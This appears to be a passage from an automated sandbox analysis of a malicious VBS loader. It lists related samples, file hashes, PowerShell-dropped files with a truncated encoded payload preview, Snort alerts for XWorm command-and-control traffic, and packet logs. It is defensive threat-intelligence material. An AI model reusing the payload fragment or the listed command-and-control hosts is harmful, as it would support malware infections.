                                                                          • 104.26.12.205
                                                                          ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.74.152
                                                                          https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                                                          • 104.18.138.17
                                                                          PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 104.26.12.205
                                                                          ATGS-MMD-ASUSClear.7zGet hashmaliciousUnknownBrowse
                                                                          • 34.160.144.191
                                                                          http://info.ipreo.com/Privacy-Policy.htmlGet hashmaliciousUnknownBrowse
                                                                          • 34.149.2.41
                                                                          AsrP4dFOgM.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 48.57.70.11
                                                                          gJlGkncVHO.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 57.208.217.43
                                                                          gm7Kudjyws.elfGet hashmaliciousGafgytBrowse
                                                                          • 57.56.43.154
                                                                          https://miempresaessaludable.theobjective.comGet hashmaliciousUnknownBrowse
                                                                          • 57.128.96.202
                                                                          6uBxa0vGQt.elfGet hashmaliciousGafgytBrowse
                                                                          • 33.90.14.151
                                                                          n8RoxsQ4om.elfGet hashmaliciousMiraiBrowse
                                                                          • 57.141.231.20
                                                                          Xi102MnZby.elfGet hashmaliciousMiraiBrowse
                                                                          • 48.85.179.246
                                                                          TYxryaQOKO.elfGet hashmaliciousMiraiBrowse
                                                                          • 48.178.171.26
                                                                          GTT-BACKBONEGTTDEupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 69.31.136.57
                                                                          time.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 69.31.136.53
                                                                          http://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                                          • 69.167.127.106
                                                                          http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                                          • 69.167.127.106
                                                                          la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                          • 69.31.5.255
                                                                          TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                                                          • 208.97.218.33
                                                                          81#Uff09.exeGet hashmaliciousUnknownBrowse
                                                                          • 23.62.176.141
                                                                          YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                                                          • 212.222.82.254
                                                                          M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                                                          • 74.199.145.209
                                                                          kuzen.vbsGet hashmaliciousUnknownBrowse
                                                                          • 23.62.176.141

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          time.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          windows.vbsGet hashmaliciousUnknownBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          https://mydhl.express.dhl$tracking_link/Get hashmaliciousUnknownBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.17
                                                                          37f463bf4616ecd445d4a1937da06e19update.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          time.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          windows.vbsGet hashmaliciousUnknownBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          Clear.7zGet hashmaliciousUnknownBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57
                                                                          Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 172.67.170.105
                                                                          • 69.31.136.57

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.8908305915084105
                                                                          Encrypted:false
                                                                          SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                          MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                          SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                          SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                          SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:@...e................................................@..........

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4po433uc.tt5.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evqfq3lo.tlf.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snsziaf5.1x5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgxgobk3.rwg.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Blanko.Pro

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):494268
                                                                          Entropy (8bit):5.944760412815436
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Kpo7AMlm6EE89yWbfwCQk1/YE3NXxy2yEYXcDUo0D:O8N7E78ArDmWQ28cDUtD
                                                                          MD5:5A1B718A30938CC57569037887C3C7A4
                                                                          SHA1:186AAED9BF3BA2D64A0D532CD605648E5EDFF6B7
                                                                          SHA-256:D0790D9C9A95CDBE48F8A3947D351EAD3D816D646213D023E35CCA22995F51E1
                                                                          SHA-512:D54FD64D63FE799E7799FCCF39082F1166D1E707A02A2ECEC53DA2A9F446DEAB1D4DDA5E7B3E27F247521C6EDFD54330F1C39016B46D1689A34F345FE7D14C42
                                                                          Malicious:false
                                                                          Preview:6wIT0nEBm7uVcBwAcQGb6wL0lQNcJARxAZvrAqf2uc8qTzxxAZvrAkJkgcGx1TIK6wJF7usCYWqB8YAAgkZxAZtxAZvrAoAq6wJr0Lqjck5QcQGbcQGb6wLwB3EBmzHK6wKzuesCZJmJFAvrAv5E6wLyctHicQGb6wK0SIPBBHEBm3EBm4H5K9J+AnzK6wJeBOsCo4+LRCQE6wJHxHEBm4nD6wKrmnEBm4HD8wC3AXEBm+sCyD+6jCm5cXEBm+sCmjyB8oLMfflxAZtxAZuB8g7lxIhxAZvrAvku6wKOfnEBm+sCy0txAZuLDBDrAojWcQGbiQwTcQGbcQGbQusC5c5xAZuB+sg0BQB11nEBm3EBm4lcJAzrAkT0cQGbge0AAwAAcQGb6wKPh4tUJAjrAk8r6wI8h4t8JATrAjyrcQGbietxAZvrAt1ogcOcAAAA6wKr2esCEGlT6wK2gnEBm2pA6wIv8XEBm4nr6wKa+esCLnPHgwABAAAAUJ4CcQGb6wLx9oHDAAEAAOsC5wxxAZtTcQGb6wIsJonrcQGb6wIOoIm7BAEAAHEBm3EBm4HDBAEAAHEBm+sCRHRT6wK8RnEBm2r/cQGb6wLsa4PCBXEBm3EBmzH2cQGb6wJpDDHJcQGbcQGbixpxAZtxAZtBcQGb6wJthTkcCnXz6wIBEOsCylhGcQGbcQGbgHwK+7h13esCHPjrAr7zi0QK/HEBm3EBmynwcQGbcQGb/9LrAna7cQGbusg0BQBxAZtxAZsxwOsC2+PrAjrYi3wkDOsC1rRxAZuBNAeKkkvr6wLlmOsCEdSDwARxAZtxAZs50HXkcQGbcQGbifvrAs3d6wJXuP/X6wL0sOsCsKYOWnMyA3fKB/5S/+sLVj9WPpIeYm8rteXKuMoCUj6YBwtjobSBPcoCPq8seQ5kjK+Hks/3LGAt0lkTP+aKmPD4ZBamav6fS78oamaND1jKr4eSbRE4XM8HAweW6oqS8ZnCt2Yc

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with CRLF line terminators
                                                                          Entropy (8bit):5.07151697527724
                                                                          TrID:
                                                                          • Visual Basic Script (13500/0) 100.00%
                                                                          File name:file.vbs
                                                                          File size:74'260 bytes
                                                                          MD5:7c89c3540caaa52052018271109f6a9a
                                                                          SHA1:78c973d9ab8326fbbacb11b7c5d8492030f8e3c4
                                                                          SHA256:9fde917e0e590e34264a37918d73be9645301cd68793cf28bbb8430dd1a6fed2
                                                                          SHA512:83750d0d142d8f3b7a6ce6edb304576561e2d5db69b0e6afd088f24af4a1b00abf49224a5227b1106b39734fef18ed1c87f45b210d1ac989d496d59c685e3bf1
                                                                          SSDEEP:1536:+gcBy6Tr/S2UT3WnyhNZvaOh9jWoAYz1P74QhblEiAGTC:+qs7UTGncNZvX9K450Qx8GTC
                                                                          TLSH:E9736C95EB4949164C4A2BABFC415D82D67C860601E33195BEDD0F9E600E46CE3FEACF
                                                                          File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Subarktiskes = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman sol

                                                                          File Icon

                                                                          Icon Hash:68d69b8f86ab9a86

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          05/23/24-18:27:00.510391TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M288964971357.128.155.22192.168.2.8
                                                                          05/23/24-18:27:15.305430TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497138896192.168.2.857.128.155.22
                                                                          05/23/24-18:26:16.229142TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497138896192.168.2.857.128.155.22
                                                                          05/23/24-18:27:15.263195TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes88964971357.128.155.22192.168.2.8

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 23, 2024 18:25:12.473606110 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:12.473647118 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:12.473737955 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:12.484323025 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:12.484337091 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.038237095 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.038356066 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:13.043315887 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:13.043332100 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.043560982 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.057718039 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:13.098503113 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.724102974 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.724209070 CEST44349705172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:13.724267006 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:13.726701975 CEST49705443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:19.351075888 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:19.351114988 CEST44349706172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:19.351232052 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:19.351813078 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:19.351826906 CEST44349706172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:19.886831999 CEST44349706172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:19.929627895 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:20.368202925 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:20.368232012 CEST44349706172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:20.878765106 CEST44349706172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:20.878941059 CEST44349706172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:20.879046917 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:20.879407883 CEST49706443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:20.940155983 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:20.940196991 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:20.940289974 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:20.940615892 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:20.940627098 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:21.718049049 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:21.718156099 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:21.720343113 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:21.720355034 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:21.720597982 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:21.721779108 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:21.766501904 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.047682047 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.047738075 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.047781944 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.047812939 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.047842026 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.047856092 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.047888994 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.075401068 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.075426102 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.075467110 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.075476885 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.075501919 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.075525999 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.132886887 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.132915020 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.132966042 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.132983923 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.133012056 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.133039951 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.151437998 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.151458025 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.151521921 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.151539087 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.151581049 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.172905922 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.172935009 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.172982931 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.172990084 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.173032045 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.173053026 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.186645031 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.186670065 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.186712980 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.186717033 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.186736107 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.186788082 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.223189116 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.223217964 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.223259926 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.223269939 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.223298073 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.223318100 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.232285976 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.232312918 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.232356071 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.232362032 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.232383966 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.232407093 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.239893913 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.239912987 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.239978075 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.239989042 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.240088940 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.245734930 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.245754957 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.245814085 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.245820999 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.245857000 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.245877981 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.252068043 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.252088070 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.252144098 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.252151966 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.252180099 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.252198935 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.318866968 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.318886995 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.318990946 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.319011927 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.319055080 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.323803902 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.323822975 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.323906898 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.323914051 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.323920965 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.323957920 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.328274965 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.328294039 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.328377008 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.328382969 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.328423977 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.332432985 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.332451105 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.332560062 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.332565069 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.332616091 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.336167097 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.336184978 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.336267948 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.336273909 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.336353064 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.340164900 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.340183973 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.340229988 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.340234041 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.340282917 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.343960047 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.343981028 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.344037056 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.344042063 CEST4434970869.31.136.17192.168.2.8
